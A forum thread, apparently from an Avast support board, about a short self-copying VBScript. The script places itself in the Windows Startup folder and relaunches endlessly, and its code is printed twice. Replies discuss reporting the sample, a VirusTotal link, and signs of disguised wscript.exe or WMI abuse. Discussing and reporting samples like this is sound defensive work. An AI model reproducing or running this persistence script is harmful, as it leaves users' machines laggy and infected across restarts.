Interesting virus

[lichesssatrancturkiye]

File name : file.vbs

Code: [Select]

CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file.vbs")
Set objShell = Nothing
when this program runs mouse cursor always runs and pc becomes laggy and this programs still runs after restart
it's easy to delete this virus (you can't delete file you should edit file like this
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("chrome")
Set objShell = Nothing but it's too interesting avast can't detect it
Notice : I tried close this virus with task manager but doesn't work and when this virus runs computer uses 100% cpu (because antivirus scans files again and again but can't detect anything also virus program runs himself every time )

[DavidR]

I suggest that you modify your post rather than post the code, post an image or wrap the code in code tags (as I have below).

Code: [Select]

CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("file.vbs")
Set objShell = Nothing
when this program runs mouse cursor always runs and pc becomes laggy and this programs still runs after restart
it's easy to delete this virus (you can't delete file you should edit file like this
CreateObject("Shell.Application").Namespace(7).CopyHere WScript.ScriptFullName, 4 + 16 + 1024
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Run("chrome")
Set objShell = Nothing

But my preference would always to use an image.

[Asyn]

You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php

[polonus]

Do as DavidR suggests, we do not want malcreants  to abuse this in some way or other. 

It is a legit Windows script, and as potentially malicious Avast should detect this as Win32:Vitro.

Typically, the wscript.exe executable can be located in "C:\Windows\System32",
 a Windows folder that contains operating system files.
However, if the wscript.exe filename is used to disguise malware,
this particular file is placed in another folder and/or will have a different name (for example, wcript.exe).

Typically, cyber criminals give names very similar to legitimate files to avoid suspicion.
Moreover when a malicious process is running in Task Manager, it should contain a graphic icon beside it,
when actually it should have a system icon.

One should note that virus detection engines sometimes detect legitimate files as threats
(this could provide  so-called 'false positive' results - FP's).

Submittal to avast as Asyn suggests in his posting may prevent this in the future for the "unaware".

All the more reason to be very suspicious with such Wscript shell virus examples.

polonus

[Pondus]

https://www.virustotal.com/gui/file/5ebef475a0c7b35e40b3422aa2afb833dfc1adfdccd4d462de2d7e2fe9afff6f?nocache=1

[polonus]

The children of a WmiPrvSE process can often be the clue that helps identify suspicious behavior. If a wsmprovhost.exe process is identified on a system, it indicates PowerShell remoting activity. This process is executed on the remote, or target system.

source: SANS.org - could be part of WMI attacks.

pol